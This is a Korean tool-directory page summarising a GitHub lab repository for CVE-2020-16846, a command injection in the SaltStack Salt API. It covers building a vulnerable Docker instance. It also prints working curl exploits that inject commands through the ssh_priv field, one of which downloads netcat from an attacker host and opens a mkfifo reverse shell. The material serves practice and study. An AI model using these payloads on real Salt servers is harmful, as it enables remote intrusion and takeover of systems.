Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-16846-Saltstack-Salt-API | Kitploit
도구/GitHubGitHub/zomy22/cve-2020-16846-saltstack-salt-api
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubzomy22/cve-2020-16846-saltstack-salt-api

CVE-2020-16846-Saltstack-Salt-API

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
4년 전아직 검토되지 않음

CVE-2020-16846-Saltstack-Salt-API

취약점 설명: SaltStack Salt 3002까지의 버전에서 문제가 발견되었습니다. SSH 클라이언트가 활성화된 상태에서 Salt API로 조작된 웹 요청을 보내면 셸 주입이 발생할 수 있습니다. 이 취약점에 대한 자세한 내용은 다음에서 확인할 수 있습니다.

https://www.zerodayinitiative.com/blog/2020/11/24/detailing-saltstack-salt-command-injection-vulnerabilities

연습 및 학습 목적으로 취약한 인스턴스를 만들고 이를 악용하기로 결정했습니다.

취약한 버전: https://github.com/saltstack/salt/releases/tag/v3002

Ubuntu 20.04.03에서 테스트됨

지침

Dockerfile을 사용하여 Docker에 취약한 인스턴스를 생성하세요.

Ubuntu VM에 취약한 인스턴스를 생성하려면 salt_setup.sh를 실행하세요.

이미지 빌드

docker build -t salt-image .

컨테이너를 실행하고 포트를 노출하세요 (악용하려면 실제로 8080만 필요합니다).

docker run -p4506:4506 -p4505:4505 -p8000:8000 -it salt-image:latest

api

악용

curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"|id>/tmp/test #"}'

reverse_shell

리버스 셸

root@kitploit:~
root@kali:~# curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"| /usr/bin/wget http://$attacker_ip/nc -O /root/nc; chmod +x /root/nc; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/root/nc $attacker_ip $listener_port >/tmp/f  #"}'

pwned

도구 다운로드